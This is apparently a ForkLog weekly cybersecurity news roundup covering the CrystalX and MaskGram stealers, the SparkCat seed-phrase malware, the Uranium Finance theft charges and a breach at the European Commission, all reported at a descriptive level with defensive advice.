We’ve compiled the most important cybersecurity news from the past week.

  • A prank Trojan has been discovered in Russia that tracks, alters crypto addresses, and mocks users.
  • Server addresses for cryptocurrency theft software were found on Spotify and Chess.com.
  • A hacker has been charged with stealing $53 million from the Uranium cryptocurrency exchange.
  • Experts have identified an updated stealer for seed phrases targeting Apple and Android devices.

A Prank Trojan Discovered in Russia

Kaspersky Lab experts identified an active campaign in Russia promoting a new Trojan called CrystalX. It is distributed via a CaaS model through ads on social media platforms like Telegram and YouTube.

The software functions as both a spy and a stealer, enabling the following actions:

  • stealing browser credentials and accounts from Steam, Discord, and Telegram;
  • silently replacing cryptocurrency wallet addresses in the clipboard;
  • secretly recording audio and video from the screen and webcam.

A distinctive feature of the malware is its real-time mockery of users. The control panel includes a dedicated Rofl section with commands such as:

  • downloading an image from a specified URL and setting it as the desktop background;
  • rotating the screen orientation by 90°, 180°, or 270°;
  • shutting down the operating system using the shutdown.exe utility;
  • swapping the left and right mouse button functions;
  • turning off the monitor and blocking input;
  • shaking the cursor at short intervals;
  • hiding all file icons on the desktop, disabling the taskbar, task manager, and cmd.exe.

Additionally, the attacker can send a message to the victim, which opens a dialog box for two-way communication.

Source: Kaspersky Lab.

As noted by senior Kaspersky GReAT expert Leonid Bezvershenko in a comment to “Kodu Durova,” the virus is actively evolving and supported by its creators. He anticipates an increase in victims as the geography of attacks expands.

Experts recommend downloading applications only from official stores, installing reliable antivirus software, and enabling file extension visibility in Windows to avoid accidentally launching dangerous files with .EXE, .VBS, and .SCR formats.

Server Addresses for Cryptocurrency Theft Software Found on Spotify and Chess.com

Researchers from Solar 4RAYS have noted that hackers are hiding the addresses of the control servers for the MaskGram stealer in profiles on Spotify and Chess.com.

MaskGram aims to steal accounts and cryptocurrencies and can load additional modules.

The malware collects data about the system, process list, and installed applications, and takes screenshots. It extracts information from Chromium browsers, cryptocurrency wallets, email clients, messengers, and VPN applications.

Cybercriminals distribute the software through social engineering, disguising it as hacked versions of paid programs for mass login and password checks against leaked databases like Netflix Hunter Combo Tool, Steam Combo Extractor, and Deezer Checker.

According to experts, the software employs a “dead drop” or Dead Drop Resolver (DDR) technique, which allows it to store information about the control server on public service pages and change it quickly.

The infected machine connects not to a suspicious IP but to Spotify or Chess.com, displaying normal user activity.

For each platform, a specific set of markers is used. For example, for Chess.com, it’s the about field in the user profile. The extracted string is decoded and transformed into the server domain.

In March, Aikido specialists documented the use of the dead drop technique by the GlassWorm stealer in cryptocurrency transactions on the Solana blockchain.

Hacker Charged with Stealing $53 Million from Uranium Exchange

The U.S. Attorney's Office charged Jonathan Spalletta with stealing over $53 million from the Uranium Finance cryptocurrency exchange and money laundering.

In April 2021, Spalletta (also known by the nickname Cthulhon) hacked the decentralized exchange (DEX) Uranium on the BNB Chain. The resulting funds shortage forced the company to shut down.

In February 2025, during a search, law enforcement seized valuable items from the suspect's home and restored access to cryptocurrency worth about $31 million.

According to law enforcement, Spalletta laundered the stolen assets through DEX and the mixer Tornado Cash. He spent the proceeds on collectibles:

  • a Magic: The Gathering card “Black Lotus” — ~$500,000;
  • 18 sealed Alpha Edition Magic: The Gathering boosters — ~$1.5 million;
  • a complete first edition Pokémon base set — ~$750,000;
  • an ancient Roman coin minted to commemorate the assassination of Julius Caesar — over $601,000.

Spalletta faces up to 10 years in prison for computer fraud and up to 20 years if convicted of money laundering.

Experts Identify Updated Seed Phrase Stealer for Apple and Android

Kaspersky Lab researchers have discovered a new version of the SparkCat malware for stealing cryptocurrencies in the Apple App Store and Google Play Store. This was reported by The Hacker News.

The stealer disguises itself as harmless applications like corporate messengers and food delivery services. In the background, it scans victims' photo galleries for cryptocurrency wallet seed phrases.

Experts analyzed two infected applications in the App Store and one in Google Play, primarily targeting cryptocurrency users in Asia:

  • iOS version. It scans mnemonic phrases for cryptocurrency wallets in English. This approach makes the iOS version potentially more dangerous globally, as it can affect users regardless of their region;
  • Android version. The updated version features several levels of code obfuscation compared to previous ones. The software uses code virtualization and cross-platform programming languages to evade analysis. Additionally, it searches for keywords in Japanese, Korean, and Chinese, confirming its focus on the Asian region.

Experts believe that a Chinese- or Russian-speaking operator is involved in the operation. According to recent data, the threat is actively evolving, and those behind it possess high technical skills.

European Commission Confirms Data Leak from ShinyHunters Cyberattack

The European Commission (EC) confirmed a data leak following a cyberattack on the Europa.eu web platform, for which the ShinyHunters ransomware group claimed responsibility.

The EC stated that the incident did not disrupt the portal's operations and was contained.

While the Commission did not provide details, the attackers informed BleepingComputer that they managed to steal over 350 GB of information, including several databases. They did not disclose how they hacked the AWS accounts but provided screenshots confirming access to some EC employees' accounts.

The group also published a post on their leak site in the dark web, claiming that over 90 GB of files were stolen:

  • mail server dumps;
  • databases;
  • confidential documents and contracts;
  • other sensitive materials.
Source: BleepingComputer.

Also on ForkLog:

  • The Solana project Drift Protocol lost $280 million.
  • CertiK warned about the risks of cryptocurrency theft via OpenClaw.

What to Read This Weekend?

After reviewing data from research teams, corporate reports, and the current state of affairs, ForkLog explored how brain-computer interface technologies are developing.